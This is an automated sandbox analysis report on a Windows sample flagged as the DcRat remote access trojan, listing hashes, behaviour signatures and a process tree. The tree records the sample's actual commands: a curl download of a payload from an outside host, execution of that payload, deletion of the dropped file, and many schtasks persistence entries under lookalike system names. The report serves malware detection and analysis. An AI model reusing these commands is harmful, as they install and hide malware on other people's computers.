Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 11:15
Static task
static1
Behavioral task
behavioral1
Sample
Paradise Private.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
Paradise Private.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Paradise Private.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
Paradise Private.exe
-
Size
855KB
-
MD5
df367e723dc5759cdad30841910cd6af
-
SHA1
eb6105e8f2462746108e94543e684c8d6a587dbb
-
SHA256
a29663d874e5fba50215d6966591407d6c9d264371ec0e726bdf5a902cf11156
-
SHA512
21f29b03a607ba8e3910ed27e802cf61db82dda0c1f3e9772127509dfd9eb7e81778463f47cbe4727116792eed83e11b91dc7fb72e455eb3b621201f9853dbb0
-
SSDEEP
12288:KvGAa5J2tubG6rOH7Fso6veRSN2ff+zOe9egX7AlGXynGnIr9BqiXb1FP:KvGAMAubGeo60OegX7AoXyn6m7Vj
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4252 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1452 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1352 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1796 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2772 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5008 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2000 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2360 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4540 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2540 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4616 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2168 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2148 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1644 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1180 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2572 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2512 4476 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2072 4476 schtasks.exe 97 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation client.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe -
Executes dropped EXE 3 IoCs
pid Process 5092 client.exe 336 chainreviewwinrefSvc.exe 2976 chainreviewwinrefSvc.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\Nui\SppExtComObj.exe chainreviewwinrefSvc.exe File created C:\Windows\SysWOW64\Nui\e1ef82546f0b02 chainreviewwinrefSvc.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Speech\client.exe curl.exe File created C:\Windows\Boot\Fonts\explorer.exe chainreviewwinrefSvc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3944 PING.EXE -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings client.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings chainreviewwinrefSvc.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3944 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4616 schtasks.exe 2772 schtasks.exe 2360 schtasks.exe 2540 schtasks.exe 2148 schtasks.exe 1180 schtasks.exe 2512 schtasks.exe 1796 schtasks.exe 5008 schtasks.exe 2168 schtasks.exe 4252 schtasks.exe 1644 schtasks.exe 2072 schtasks.exe 4540 schtasks.exe 2572 schtasks.exe 1452 schtasks.exe 1352 schtasks.exe 2000 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4668 Paradise Private.exe 4668 Paradise Private.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 336 chainreviewwinrefSvc.exe 2976 chainreviewwinrefSvc.exe 2976 chainreviewwinrefSvc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 336 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 2976 chainreviewwinrefSvc.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 4668 wrote to memory of 1728 4668 Paradise Private.exe 84 PID 4668 wrote to memory of 1728 4668 Paradise Private.exe 84 PID 4668 wrote to memory of 2240 4668 Paradise Private.exe 85 PID 4668 wrote to memory of 2240 4668 Paradise Private.exe 85 PID 2240 wrote to memory of 3652 2240 cmd.exe 86 PID 2240 wrote to memory of 3652 2240 cmd.exe 86 PID 4668 wrote to memory of 552 4668 Paradise Private.exe 87 PID 4668 wrote to memory of 552 4668 Paradise Private.exe 87 PID 552 wrote to memory of 5092 552 cmd.exe 88 PID 552 wrote to memory of 5092 552 cmd.exe 88 PID 552 wrote to memory of 5092 552 cmd.exe 88 PID 5092 wrote to memory of 4876 5092 client.exe 89 PID 5092 wrote to memory of 4876 5092 client.exe 89 PID 5092 wrote to memory of 4876 5092 client.exe 89 PID 4668 wrote to memory of 2064 4668 Paradise Private.exe 90 PID 4668 wrote to memory of 2064 4668 Paradise Private.exe 90 PID 4876 wrote to memory of 1156 4876 WScript.exe 106 PID 4876 wrote to memory of 1156 4876 WScript.exe 106 PID 4876 wrote to memory of 1156 4876 WScript.exe 106 PID 1156 wrote to memory of 336 1156 cmd.exe 108 PID 1156 wrote to memory of 336 1156 cmd.exe 108 PID 336 wrote to memory of 964 336 chainreviewwinrefSvc.exe 127 PID 336 wrote to memory of 964 336 chainreviewwinrefSvc.exe 127 PID 964 wrote to memory of 4932 964 cmd.exe 129 PID 964 wrote to memory of 4932 964 cmd.exe 129 PID 964 wrote to memory of 3944 964 cmd.exe 130 PID 964 wrote to memory of 3944 964 cmd.exe 130 PID 964 wrote to memory of 2976 964 cmd.exe 134 PID 964 wrote to memory of 2976 964 cmd.exe 134 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Paradise Private.exe"C:\Users\Admin\AppData\Local\Temp\Paradise Private.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4668 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1728
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\curl.execurl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe3⤵
- Drops file in Windows directory
PID:3652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\Speech\client.exeC:\Windows\Speech\client.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt/chainreviewwinrefSvc.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:336 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eqKvXvM17R.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\chcp.comchcp 650018⤵PID:4932
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3944
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe2⤵PID:2064
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Application Data\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4252
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default\Application Data\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Application Data\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\ssh\chainreviewwinrefSvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\Users\All Users\ssh\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\ssh\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Windows\SysWOW64\Nui\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\SysWOW64\Nui\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Windows\SysWOW64\Nui\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\ComponentCrt\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\ComponentCrt\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1644
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\ComponentCrt\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1180
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 14 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 6 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2072
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98B
MD54dafd9e9509ac96be6aa5baec659da4d
SHA1a091552663ddea89536560f232b8339f318c9cbc
SHA2560c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf
SHA512d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132
-
Filesize
1.8MB
MD511cca9e2c6dc9c2a728b89e7314ec26a
SHA158aec3b662a1c4e8b43cc454d90813ac89b5e612
SHA256300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197
SHA512fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7
-
Filesize
207B
MD5b292d233456b16f26abc1aa07c9f5de0
SHA17b025705136101b5618d81d8ebf472335eebde43
SHA256e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d
SHA5121c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4
-
Filesize
1KB
MD5af6acd95d59de87c04642509c30e81c1
SHA1f9549ae93fdb0a5861a79a08f60aa81c4b32377b
SHA2567521ee2d065a78efcab55a194fbd78492f84b70595f139263875f4ea92b194d6
SHA51293ab99bcf588fde553de3240e0d2b0cbd4e4bc5ef5e99d53f45a267d7ff30103a80b5a7aa1c52d6eff1e070af0ec82d2c0b8aafb7099742aa16810edc1815c3a
-
Filesize
168B
MD5320d3e03f9e9d4ff6b603f4004e46f2f
SHA1ab54292e2041761295ffe3dd64bf3973e06f55eb
SHA2561041e8d1f006adf5b9657077569003d8f2c05de1807a34197ddf56618f3dee9e
SHA512c3cb64af9b943df0634c11f168bd08bb6d95112778adf07fa32f9a3f7e7a83d0ecf7014cab87ca93c9ea8d91fc077db5ed22fc8a0bf4984791362e7c64f2cf0b
-
Filesize
2.1MB
MD5bf4f13d82d217ed69d80124c50d9441c
SHA1b7ee7d109f61371342e924e6a0c3505347dd318f
SHA25651890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508
SHA5121ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4